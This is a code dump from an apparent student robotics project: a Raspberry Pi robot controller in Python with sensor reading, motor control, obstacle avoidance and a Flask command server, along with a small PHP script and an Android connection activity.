----------\n    GPIO.output(PIN_TRIGGER,GPIO.HIGH) # tells the sensor to emit a pulse\n    \n    time.sleep(0.00001)\n    GPIO.output(PIN_TRIGGER,GPIO.LOW)\n    \n    while GPIO.input(PIN_ECHO)==0:\n        pulse_start_time = time.time() # time the pulse was sent\n    \n    while GPIO.input(PIN_ECHO)==1:\n        pulse_end_time = time.time() # time the reflected pulse was received\n    \n    pulse_duration = pulse_end_time - pulse_start_time\n    distance = round ( pulse_duration * 17150, 2)\n    d_ahead = distance\n    \n    # ------sensor 1----------\n    GPIO.output(PIN_TRIGGER1,GPIO.HIGH) # tells sensor 1 to emit a pulse\n    \n    time.sleep(0.00001)\n    GPIO.output(PIN_TRIGGER1,GPIO.LOW)\n    \n    while GPIO.input(PIN_ECHO1)==0:\n        pulse_start_time1 = time.time() # time the pulse was sent\n    \n    while GPIO.input(PIN_ECHO1)==1:\n        pulse_end_time1 = time.time() # time the reflected pulse was received\n    \n    pulse_duration1 = pulse_end_time1 - pulse_start_time1\n    distance1 = round ( pulse_duration1 * 17150, 2)\n    d_left = distance1\n\n    # ------sensor 2----------\n    GPIO.output(PIN_TRIGGER2,GPIO.HIGH) # tells sensor 2 to emit a pulse\n    \n    time.sleep(0.00001)\n    GPIO.output(PIN_TRIGGER2,GPIO.LOW)\n    \n    while GPIO.input(PIN_ECHO2)==0:\n        pulse_start_time2 = time.time() # time the pulse was sent\n    \n    while GPIO.input(PIN_ECHO2)==1:\n        pulse_end_time2 = time.time() # time the reflected pulse was received\n    \n    pulse_duration2 = pulse_end_time2 - pulse_start_time2\n    distance2 = round ( pulse_duration2 * 17150, 2)\n    d_right = distance2 \n    \n    print(\" Distance ahead: \" ,distance/2, \" cm \", \" left: \",distance1/2,\" cm, right: \",distance2/2, \"cm\")\n    \n    return (d_left, d_ahead, d_right)\n\ndef checkObstracle():\n    d_left, d_ahead, d_right = checkSensors()\n    \n    if d_ahead < 20:\n        return True\n    \n    return False\n\ndef turnLeft5Degrees():\n    # Turns left by an angle of 5 degrees\n    print(\"TURN LEFT 5 degrees\")\n    GPIO.output(motor_right_1A, GPIO.HIGH)\n    GPIO.output(motor_right_2A, GPIO.LOW)\n    GPIO.output(motor_left_34EN, GPIO.LOW)\n    GPIO.output(motor_right_12EN, GPIO.HIGH)\n    sleep(0.04)\n    GPIO.output(motor_right_12EN, GPIO.LOW)\n\n    return 
RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n    \ndef turnRight5Degrees():\n    # Turns right by an angle of 5 degrees\n    print(\"TURN RIGHT 5 degrees\")\n    GPIO.output(motor_left_3A, GPIO.HIGH)\n    GPIO.output(motor_left_4A, GPIO.LOW)\n    GPIO.output(motor_right_12EN, GPIO.LOW)\n    GPIO.output(motor_left_34EN, GPIO.HIGH)\n    \n    sleep(0.06)\n    GPIO.output(motor_left_34EN, GPIO.LOW)\n    \n    return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n\ndef turnLeft10Degrees():\n    turnLeft5Degrees()\n    turnLeft5Degrees()\n\n    return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n\ndef turnRight10Degrees():\n    turnRight5Degrees()\n    turnRight5Degrees()\n\n    return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n \n \ndef goAhead():\n    # Moves forward\n    print(\"GO AHEAD\")\n    GPIO.output(motor_left_3A, GPIO.HIGH)\n    GPIO.output(motor_left_4A, GPIO.LOW)\n    GPIO.output(motor_right_1A, GPIO.HIGH)\n    GPIO.output(motor_right_2A, GPIO.LOW)\n\n    obstracleDetected = False\n    \n    for i in range(0,10):\n        obstracleDetected = checkObstracle()\n\n        if obstracleDetected:\n            break\n\n        GPIO.output(motor_left_34EN, GPIO.HIGH)\n        GPIO.output(motor_right_12EN, GPIO.HIGH)\n        sleep(0.04)\n        GPIO.output(motor_left_34EN, GPIO.LOW)\n        sleep(0.01)\n        GPIO.output(motor_right_12EN, GPIO.LOW)\n    \n    if obstracleDetected:\n        print(\"Obstracle detected\")\n        return RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_DETECTED\n    \n    return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n    \ndef goBack():\n    # Moves backward\n    print(\"GO BACK\")\n    GPIO.output(motor_left_3A, GPIO.LOW)\n    GPIO.output(motor_left_4A, GPIO.HIGH)\n    GPIO.output(motor_right_1A, GPIO.LOW)\n    GPIO.output(motor_right_2A, GPIO.HIGH)\n\n    for i in range(0,10):\n        GPIO.output(motor_left_34EN, GPIO.HIGH)\n        GPIO.output(motor_right_12EN, GPIO.HIGH)\n        sleep(0.04)\n        GPIO.output(motor_left_34EN, GPIO.LOW)\n        sleep(0.01)\n        GPIO.output(motor_right_12EN, GPIO.LOW)\n    \n    return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n    \ndef stand():\n    # Switches the motors off\n    GPIO.output(motor_right_12EN, GPIO.LOW)\n    GPIO.output(motor_left_34EN, GPIO.LOW)\n\n    return RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK\n\ndef ControlGPIO():\n    global lock\n    global ContextRPi\n\n    while True:\n        print(\"CONTROL GPIO\")\n\n        lock.acquire()\n        try:\n            # Read the current values from the Context\n            msg_type = ContextRPi.RPI_DROID_COMMAND_MSG_TYPE\n            direction = ContextRPi.RPI_DROID_DIRECTION\n        finally:\n            lock.release()\n        \n        return_value = RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID\n\n        if msg_type != RPi_MSG_TYPE.RPi_MSG_INVALID:\n            if direction == RPi_DIRECTION.RPi_GO_AHEAD_SEMI_LEFT or direction == RPi_DIRECTION.RPi_GO_BACK_SEMI_RIGHT:\n                return_value = turnLeft5Degrees()\n            elif direction == RPi_DIRECTION.RPi_GO_AHEAD_SEMI_RIGHT or direction == RPi_DIRECTION.RPi_GO_BACK_SEMI_LEFT:\n                return_value = turnRight5Degrees()\n            elif direction == RPi_DIRECTION.RPi_GO_LEFT:\n                return_value = turnLeft5Degrees()\n                return_value = turnLeft5Degrees()\n                return_value = turnLeft5Degrees()\n            elif direction == RPi_DIRECTION.RPi_GO_RIGHT:\n                return_value = turnRight5Degrees()\n                return_value = turnRight5Degrees()\n                return_value = turnRight5Degrees()\n            elif direction == RPi_DIRECTION.RPi_GO_AHEAD:\n                return_value = goAhead()\n            elif direction == RPi_DIRECTION.RPi_GO_BACK:\n                return_value = goBack()\n            elif direction == RPi_DIRECTION.RPi_STAND or direction == RPi_DIRECTION.RPi_INVALID:\n                return_value = stand()\n        \n        # Update the Context\n        ContextRPi.RPI_RESPONSE = return_value\n\n        if return_value == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID or return_value == RPi_RESPONSE_OBSTRACLE.RPi_FAILURE:\n            print(\"Command failure - send notification\")\n        elif return_value == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_DETECTED:\n            print(\"Obstracle detected - send notification\")\n        elif return_value == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_PASSED:\n            print(\"Obstracle passed\")\n        elif return_value == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK:\n            print(\"Command executed successfully\")\n\n        sleep(0.5) # in seconds\n# --------------------------HARDWARE CONTROL MODULE END---------------------------\n \n# -------------------------AUTONOMOUS MOVEMENT MODULE BEGIN-------------------------\ndef checkTarget(X_coordinate, Y_coordinate):\n    # checks whether the target has been reached, i.e. the obstacle has been passed\n    if Y_coordinate > 0 and 
X_coordinate == 0:\n        ContextRPi.RPI_RESPONSE = RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_PASSED\n        return True\n    else:\n        return False\n    \n\ndef chooseTheSide(flag):\n    # Checks the sensors and, by analyzing the results, picks the side from which to go around the obstacle\n    d_left_curr, d_ahead_curr, d_right_curr = checkSensors()\n\n    # Makes a small turn to the left and checks the sensors again\n    turnLeft10Degrees()\n    d_left_curr_l1, d_ahead_curr_l1, d_right_curr_l1 = checkSensors()\n    # Makes one more small turn to the left and checks the sensors again\n    turnLeft10Degrees()\n    d_left_curr_l2, d_ahead_curr_l2, d_right_curr_l2 = checkSensors()\n    \n    # Returns to the original position\n    turnRight10Degrees()\n    turnRight10Degrees()\n    \n    # Makes a small turn to the right and checks the sensors again\n    turnRight10Degrees()\n    d_left_curr_r1, d_ahead_curr_r1, d_right_curr_r1 = checkSensors()\n\n    # Makes one more small turn to the right and checks the sensors again\n    turnRight10Degrees()\n    d_left_curr_r2, d_ahead_curr_r2, d_right_curr_r2 = checkSensors()\n\n    # Returns to the original position\n    turnLeft10Degrees()\n    turnLeft10Degrees()\n    \n    sum_left = d_left_curr + d_left_curr_l1 + d_ahead_curr_l1 + d_left_curr_l2 + d_ahead_curr_l2 + d_left_curr_r1 + d_left_curr_r2\n    sum_right = d_right_curr + d_right_curr_l1 + d_right_curr_l2 + d_ahead_curr_r1 + d_right_curr_r1 + d_ahead_curr_r2 + d_right_curr_r2\n    \n    sum_left1 = d_ahead_curr_l1 + d_ahead_curr_l2 + d_left_curr_r2\n    sum_right1 = d_ahead_curr_r1 + d_ahead_curr_r2 + d_right_curr_l2\n    \n    if ContextRPi.prevSide != RPi_SIDE.RPi_SIDE_INVALID and flag == False:\n        return ContextRPi.prevSide\n    elif ContextRPi.prevSide != RPi_SIDE.RPi_SIDE_INVALID and flag == True:\n        if sum_left1 >= sum_right1:\n            return RPi_SIDE.RPi_SIDE_LEFT\n        else:\n            return RPi_SIDE.RPi_SIDE_RIGHT\n    elif ContextRPi.prevSide == RPi_SIDE.RPi_SIDE_INVALID:\n        if sum_left == sum_right:\n            return RPi_SIDE.RPi_SIDE_CANNOT_DECIDE\n        elif sum_left > sum_right:\n            return RPi_SIDE.RPi_SIDE_LEFT\n        elif sum_left < sum_right:\n            return RPi_SIDE.RPi_SIDE_RIGHT\n    \n    \n    return RPi_SIDE.RPi_SIDE_CANNOT_DECIDE\n\n    \ndef BUGAlgorithm():\n    flagGo = False\n    side = RPi_SIDE.RPi_SIDE_INVALID\n    obstracleDetected = RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID\n    targetReached = False\n    X_coordinate = 0\n    Y_coordinate = 0\n    Angle = 0\n\n\n    while(ContextRPi.RPI_AUTO_MODE_ENABLED == RPi_AUTO_MODE.RPi_AUTO_MODE_ENABLED):\n        \n        # Check whether the target has been reached\n        targetReached = checkTarget(X_coordinate, Y_coordinate)\n        if targetReached == True:\n            turns = Angle/5\n            turns = int(turns)\n            if turns < 0:\n                turns = -turns\n            \n            for i in range(0,turns):\n                if Angle < 0:\n                    turnRight5Degrees()\n                else:\n                    turnLeft5Degrees()\n\n            print(\"Target reached (obstacle passed) -> continuing forward\")\n            break\n\n        # Moving forward\n        obstracleDetected = goAhead()\n        while obstracleDetected == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK: # keeps going forward as long as it can\n            flagGo = True\n            Y_coordinate = 8.9\n            obstracleDetected = goAhead()\n        \n        if obstracleDetected == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_DETECTED:\n            # Picks the side from which to go around the obstacle\n            ContextRPi.prevSide = side\n            side = chooseTheSide(flagGo)\n            \n            if side == RPi_SIDE.RPi_SIDE_LEFT: # Tries to go around on the left side\n                flagGo = False \n                turnLeft5Degrees()\n                Angle = Angle - 5\n            elif side == RPi_SIDE.RPi_SIDE_RIGHT: # tries to go around on the right side\n                flagGo = False\n                turnRight5Degrees()\n                Angle = Angle + 5\n            elif side == RPi_SIDE.RPi_SIDE_CANNOT_DECIDE:\n                print(\"Cannot decide which side to pass the obstacle on, choosing at random\")\n                randNumber = random.random()\n                if 
randNumber < 0.5:\n side = RPi_SIDE.RPi_SIDE_LEFT\n flagGo = False # Pokusava obilazak sa leve strane\n turnLeft5Degrees()\n Angle = Angle - 5\n else:\n side = RPi_SIDE.RPi_SIDE_RIGHT\n flagGo = False # Pokusava obilazak sa leve strane\n turnRight5Degrees()\n Angle = Angle + 5\n elif side == RPi_SIDE.RPi_SIDE_INVALID:\n print(\"ERROR chooseSide\")\n \n# -------------------------_MODUL ZA AUTONOMNO KRETANJE END-_------------------------\n \n# ----------------------------MODUL ZA KOMUNIKACIJU BEGIN----------------------------\ndef FlaskApplication():\n app = Flask(__name__)\n\n @app.route('/', methods=['POST'])\n def index():\n data = request.data\n req_data = request.get_json()\n message_type = req_data['message_type']\n value = req_data['value']\n str_msg_type = str(message_type)\n print(\"Dobijeno u zahtevu:\"+str_msg_type+\" \"+value)\n\n global ContextRPi\n global lock\n\n lock.acquire()\n try:\n # ########### RPi_MSG_DIRECTION BEGIN #########\n if str_msg_type.find(\"RPi_MSG_DIRECTION\") != -1:\n\n # Samo ako auto mod nije ukljucen zahtev sa aplikacije\n # moze da menja Context u suprotnom to moze samo BUGAlgorithm funkcija\n if ContextRPi.RPI_AUTO_MODE_ENABLED == RPi_AUTO_MODE.RPi_AUTO_MODE_INVALID:\n # ContextRPi.RPI_DROID_COMMAND_MSG_TYPE = RPi_MSG_TYPE.RPi_MSG_DIRECTION\n\n if value.find(\"0 stand\") != -1:\n print(\"KOMANDA ZA KRETANJE: STANI\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_STAND)\n elif value.find(\"1 go_ahead\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI NAPRED\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_AHEAD)\n elif value.find(\"2 semi_left\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI POLU LEVO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_AHEAD_SEMI_LEFT)\n elif value.find(\"3 semi_right\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI POLU DESNO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_AHEAD_SEMI_RIGHT)\n elif value.find(\"4 left\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI LEVO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_LEFT)\n elif value.find(\"5 right\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI DESNO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_RIGHT)\n elif value.find(\"6 back\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI NAZAD\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_BACK)\n elif value.find(\"7 back semi left\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI NAZAD POLU LEVO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_BACK_SEMI_LEFT)\n elif value.find(\"8 back semi right\") != -1:\n print(\"KOMANDA ZA KRETANJE: IDI NAZAD POLU DESNO\")\n ContextRPi.update_context_direction(RPi_MSG_TYPE.RPi_MSG_DIRECTION, RPi_DIRECTION.RPi_GO_BACK_SEMI_RIGHT)\n elif ContextRPi.RPI_AUTO_MODE_ENABLED == True:\n print(\"AUTO MOD ukljucen - ignorisem naredbe za smer\")\n # ########### RPi_MSG_DIRECTION END ###########\n\n # ########### RPi_MSG_CONNECTING BEGIN ############\n elif str_msg_type.find(\"RPi_MSG_CONNECTING\") != -1:\n ContextRPi.update_context_conn(RPi_MSG_TYPE.RPi_MSG_CONNECTING, True)\n print(\"Uspostavljanje veze\")\n ContextRPi.threadControlGPIO.start()\n # ######### RPi_MSG_CONNECTING END ############\n\n # ########## RPi_MSG_DISCONNECTING BEGIN ############\n elif 
str_msg_type.find(\"RPi_MSG_DISCONNECTING\") != -1:\n ContextRPi.update_context_conn(RPi_MSG_TYPE.RPi_MSG_DISCONNECTING, False)\n print(\"Prekidanje veze\")\n ContextRPi.threadControlGPIO.join()\n # ############ RPi_MSG_DISCONNECTING END #############\n\n # ############## RPi_MSG_AUTO_MODE BEGIN #############\n elif str_msg_type.find(\"RPi_MSG_AUTO_MODE\") != -1:\n if value.find(\"enable_auto_mode\") != -1:\n ContextRPi.update_context_auto_mode(RPi_MSG_TYPE.RPi_MSG_AUTO_MODE, RPi_AUTO_MODE.RPi_AUTO_MODE_ENABLED)\n ContextRPi.threadBUG.start()\n print(\"Enable auto mode\")\n elif value.find(\"disable_auto_mode\") != -1:\n ContextRPi.update_context_auto_mode(RPi_MSG_TYPE.RPi_MSG_AUTO_MODE, RPi_AUTO_MODE.RPi_AUTO_MODE_DISABLED)\n print(\"Disable auto mode\")\n ContextRPi.threadBUG.join()\n # ########## RPi_MSG_AUTO_MODE END ##############\n finally:\n lock.release()\n \n print(\"-----DUMP CONTEXT------\")\n print(\"-----SET RPI_DROID_COMMAND TYPE: \",\n ContextRPi.RPI_DROID_COMMAND_MSG_TYPE)\n print(\"-----SET RPI_DROID_COMMAND: DIRECTION: \",\n ContextRPi.RPI_DROID_DIRECTION)\n print(\"-----SET RPI_DROID_COMMAND: CONNECTED: \",\n ContextRPi.RPI_DRОID_CONNECTED)\n print(\"-----SET RPI_DROID_COMMAND: RPI_AUTO_MODE_ENABLED: \",\n ContextRPi.RPI_AUTO_MODE_ENABLED)\n print(\"-----SET RPI_DROID_COMMAND: RPI_RESPONSE: \",\n ContextRPi.RPI_RESPONSE)\n\n sResponse = json.dumps({\"response_status\": ContextRPi.getStringResponse(), \"aditional_info\": ContextRPi.aditionalResponseInfo}, sort_keys=False)\n print(sResponse)\n return sResponse\n\n try:\n app.run(debug=False, use_reloader=False, threaded=True, host='0.0.0.0')\n except Exception:\n print(\"Pokretanje flask aplikacije za komunikaciju neuspesno\")\n\n# ----------------------------MODUL ZA KOMUNIKACIJU END----------------------------\n\n# Klasa Context je deljeni resurs preko koje komuniciraju svi moduli\nclass Context:\n def __init__(self):\n self.RPI_DROID_COMMAND_MSG_TYPE = RPi_MSG_TYPE.RPi_MSG_INVALID\n self.RPI_DROID_DIRECTION = RPi_DIRECTION.RPi_INVALID\n self.RPI_DRОID_CONNECTED = False\n self.RPI_AUTO_MODE_ENABLED = RPi_AUTO_MODE.RPi_AUTO_MODE_INVALID\n self.RPI_RESPONSE = RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID\n self.aditionalResponseInfo = \"\"\n self.prevSide = RPi_SIDE.RPi_SIDE_INVALID\n self.threadControlGPIO = Thread(target=ControlGPIO, args=())\n self.threadBUG = Thread(target=BUGAlgorithm, args=())\n\n def update_context_direction(self, msg_type, direction):\n print(\"update_context_direction called\")\n self.RPI_DROID_COMMAND_MSG_TYPE = msg_type\n self.RPI_DROID_DIRECTION = direction\n\n def update_context_conn(self, conn):\n print(\"update_context_direction called\")\n self.RPI_DRОID_CONNECTED = conn\n \n def update_context_auto_mode(self, am):\n print(\"update_context_conn called\")\n self.RPI_AUTO_MODE_ENABLED = am\n \n def update_context_response(self, response):\n print(\"update_context_response called\")\n self.RPI_RESPONSE = response\n \n def update_context_aditional_info(self, ad_info):\n print(\"update_context_aditional_info called\")\n self.aditionalResponseInfo = ad_info\n \n def update_context_prev_side(self, prev):\n print(\"update_context_prev_side called\")\n self.prevSide = prev\n \n def get_current_msg_type(self):\n print(\"get_current_msg_type called\")\n return self.RPI_DROID_COMMAND_MSG_TYPE\n\n def get_current_direction(self):\n print(\"get_current_direction called\")\n return self.RPI_DROID_DIRECTION\n \n def get_connection(self):\n print(\"get_connection called\")\n return self.RPI_DRОID_CONNECTED\n 
\n    def get_auto_mode(self):\n        print(\"get_auto_mode called\")\n        return self.RPI_AUTO_MODE_ENABLED\n    \n    def get_curr_response(self):\n        print(\"get_curr_response called\")\n        return self.RPI_RESPONSE\n    \n    def get_aditional_indo(self):\n        print(\"get_aditional_indo called\")\n        return self.aditionalResponseInfo\n    \n    def get_prev_side(self):\n        print(\"get_prev_side called\")\n        return self.prevSide\n    \n    def getStringResponse(self):\n        \n        response = \"\"\n        \n        if self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_INVALID or self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPi_FAILURE:\n            response = \"FAILURE\"\n        elif self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPi_RESPONSE_OK:\n            response = \"OK\"\n        elif self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_DETECTED:\n            response = \"OBSTRACLE_DETECTED\"\n        elif self.RPI_RESPONSE == RPi_RESPONSE_OBSTRACLE.RPI_OBSTRACLE_PASSED:\n            response = \"OBSTRACLE_PASSED\"\n        else:\n            response = \"UNDEFINED\"\n\n        return response\n    \n# Updating and reading the values of the Context object is protected by this mutex\nlock = threading.Lock()\nContextRPi = Context()\n\nif __name__ == '__main__':\n    # 0.0.0.0 must be used in app.run so that the web server\n    # is reachable from any device on the same network\n    print(\"application started\")\n    # _thread.start_new_thread(ControlGPIO,())\n    # tid = _thread.start_new_thread(FlaskApplication, ())\n\n    # t1.join()\n    # t1 = Thread(target=ControlGPIO, args=())\n    # t1.start()\n\n    # t = Thread(target=FlaskApplication, args=())\n    # t.start()\n    # t.join()\n    FlaskApplication()\n\n    # t1.join()" }, { "alpha_fraction": 0.6071428656578064, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 19.14285659790039, "blob_id": "d137ed6ebeb34ed48ceb38c53f614f945b9179ee", "content_id": "114876e532a86ce43e3a23ba7e3c8050ce191606", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 140, "license_type": "no_license", "max_line_length": 64, "num_lines": 7, "path": "/Web application - test/master_web_app/direction_right_service.php", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "<?php\n$myfile = fopen(\"test.php\", \"w\") or die(\"Unable to open file!\");\n$txt = \"right\";\nfwrite($myfile, $txt);\necho $txt;\nfclose($myfile);\n?>" }, { "alpha_fraction": 0.5717625617980957, "alphanum_fraction": 0.5751168727874756, "avg_line_length": 37.73228454589844, "blob_id": "ab501aaab4788a94f4f3f886af736615c62f929e", "content_id": "d2ecc11a64a77b1b982073933f40ac71704bd1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 9838, "license_type": "no_license", "max_line_length": 144, "num_lines": 254, "path": "/Android application/rpidroid_robot/app/src/main/java/matf/beograd/master/nenadlazic/rpidroid_robot/IpActivity.java", "repo_name": "nenadlazic/RPiRobot", "src_encoding": "UTF-8", "text": "/**\n * Created by nlazic on 12/25/2017.\n */\npackage matf.beograd.master.nenadlazic.rpidroid_robot;\n\nimport android.content.Context;\nimport android.graphics.drawable.AnimationDrawable;\nimport android.support.v7.app.AppCompatActivity;\nimport android.os.Bundle;\nimport android.view.View;\nimport android.widget.Button;\nimport android.widget.EditText;\nimport android.widget.ImageView;\nimport android.content.SharedPreferences;\nimport android.os.Handler;\nimport android.content.Intent;\n\n//VOLLEY work ok***********************************************************************************\n//import com.android.volley.Request;\n//import 
com.android.volley.Response;\n//import com.android.volley.VolleyError;\n//import com.android.volley.toolbox.StringRequest;\n//************************************************************************************************\n\n\npublic class IpActivity extends AppCompatActivity {\n\n    //Handlers for loading animation during connecting\n    AnimationDrawable animation;\n    ImageView loading;\n\n    //Handler for connection button\n    Button btnConnect;\n    //Handler for the IP address field\n    EditText editText;\n\n    //Volley handler which will be used throughout the life cycle of the application\n    //SingletonVolley volleyHandler;\n\n    private boolean connected;\n\n\n    @Override\n    protected void onCreate(Bundle savedInstanceState) {\n        super.onCreate(savedInstanceState);\n        setContentView(R.layout.activity_ip);\n\n        //Prepare loading animation\n        loading = (ImageView) findViewById(R.id.imageView2);\n        animation = (AnimationDrawable) loading.getDrawable();\n\n        //Get handlers for UI components\n        btnConnect = (Button) findViewById(R.id.button_ip);\n        editText = (EditText) findViewById(R.id.edit_ip);\n\n        connected = false;\n\n        String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n        Utils.RPiToastLog(nameMethod, getApplicationContext());\n        Utils.RPiAndroidLog(nameMethod);\n\n    }\n\n    @Override\n    protected void onStart() {\n        super.onStart();\n\n        String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n        Utils.RPiToastLog(nameMethod, getApplicationContext());\n        Utils.RPiAndroidLog(nameMethod);\n    }\n\n    @Override\n    protected void onResume() {\n        super.onResume();\n\n        String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n        Utils.RPiToastLog(nameMethod, getApplicationContext());\n        Utils.RPiAndroidLog(nameMethod);\n    }\n\n    @Override\n    protected void onPause() {\n        super.onPause();\n\n        String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n        Utils.RPiToastLog(nameMethod, getApplicationContext());\n        Utils.RPiAndroidLog(nameMethod);\n    }\n\n    @Override\n    protected void onStop() {\n        super.onStop();\n\n        String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n        Utils.RPiToastLog(nameMethod, getApplicationContext());\n        Utils.RPiAndroidLog(nameMethod);\n    }\n\n    @Override\n    protected void onRestart() {\n        super.onRestart();\n\n        String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n        Utils.RPiToastLog(nameMethod, getApplicationContext());\n        Utils.RPiAndroidLog(nameMethod);\n\n        if(connected == true){\n            final Handler handler = new Handler();\n            handler.postDelayed(new Runnable() {\n                @Override\n                public void run() {\n                    //Do something after 3s\n                    //send intent\n                    Intent intent = new Intent(getApplicationContext(), AllegationsRobot.class);\n                    startActivity(intent);\n                }\n            }, 3000);\n        }\n    }\n\n    @Override\n    protected void onDestroy() {\n        super.onDestroy();\n\n        String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n        Utils.RPiToastLog(nameMethod, getApplicationContext());\n        Utils.RPiAndroidLog(nameMethod);\n    }\n\n    //Connection button listener\n    public void connectingStart(final View v) {\n        //Check if the IP address field is correctly filled, then create the request and start the animation\n        final String sIpAddress = editText.getText().toString();\n        if (Utils.isIpAddress(sIpAddress)) {\n            startAnimation(v);\n            btnConnect.setClickable(false);\n\n            String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n            Utils.RPiToastLog(nameMethod, getApplicationContext());\n            Utils.RPiAndroidLog(nameMethod);\n\n            HttpService httpService = new HttpService(getApplicationContext(), new Utils.OnResponseListener<String>() {\n                @Override\n                public void onSuccess(String object) {\n\n                    String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n                    Utils.RPiToastLog(object.toString(), getApplicationContext());\n                    Utils.RPiAndroidLog(nameMethod);\n                    connected = true;\n\n                    stopAnimation(v, Utils.HttpResponseCode.RPi_HTTP_OK);\n\n\n                    //Save ip address in shared preference\n                    SharedPreferences settings = getSharedPreferences(GlobalContextApplication.IP_ADDRESS_PREFS_NAME, Context.MODE_PRIVATE);\n                    SharedPreferences.Editor editor = getSharedPreferences(GlobalContextApplication.IP_ADDRESS_PREFS_NAME, MODE_PRIVATE).edit();\n                    editor.putString(GlobalContextApplication.mPrefsName, sIpAddress);\n                    editor.putInt(\"something\",1);\n                    editor.apply();\n\n                    //TODO use in another activity\n                    //Read ip address from shared pref\n                    SharedPreferences prefs = getSharedPreferences(GlobalContextApplication.IP_ADDRESS_PREFS_NAME, MODE_PRIVATE);\n                    String sIpAdRestore = prefs.getString(GlobalContextApplication.mPrefsName,\"default_return_value\");\n                    Utils.RPiAndroidLog(\"From shared pref: \"+sIpAdRestore);\n                    Utils.RPiToastLog(sIpAdRestore,getApplicationContext());\n\n                    //TODO intent for new activity\n                    final Handler handler = new Handler();\n                    handler.postDelayed(new Runnable() {\n                        @Override\n                        public void run() {\n                            //Do something after 3s\n                            //send intent\n                            Intent intent = new Intent(getApplicationContext(), AllegationsRobot.class);\n                            startActivity(intent);\n                        }\n                    }, 3000);\n                }\n\n                @Override\n                public void onFailure(Exception e) {\n                    editText.setText(\"exception\");\n\n                    String nameMethod = new Object(){}.getClass().getEnclosingMethod().getName();\n                    Utils.RPiToastLog(nameMethod, getApplicationContext());\n                    Utils.RPiAndroidLog(nameMethod);\n\n                    stopAnimation(v, Utils.HttpResponseCode.RPi_UNDEFINED);\n                    btnConnect.setClickable(true);\n                }\n            }, sIpAddress,\"connecting\", Utils.MessageType.RPi_MSG_CONNECTING);\n\n            httpService.execute();\n        } else {\n            stopAnimation(v, Utils.HttpResponseCode.RPi_UNDEFINED);\n        }\n    }\n\n    //Starting loading animation\n    
public void onErrorResponse(VolleyError error) {\n// // Do something when get error\n// //Snackbar.make(mCLayout, \"Error...\", Snackbar.LENGTH_LONG).show();\n// }\n// }\n// );\n// volleyHandler.addToRequestQueue(stringRequest);\n//*************************************************************************************************\n" } ]
6
Kuiteland/daemonlord
https://github.com/Kuiteland/daemonlord
94fea68a0cc0d0803ba7fe4bcf57ba4cce22dcc4
095b9bb9dbcfeb8533cb3a0e2eaad5c67e19df9a
3ad088e19fa8dc0ec82fd9c39165042950d74776
refs/heads/main
2023-04-07T04:13:25.137325
2021-04-22T00:49:40
2021-04-22T00:49:40
null
0
0
null
null
null
null
null
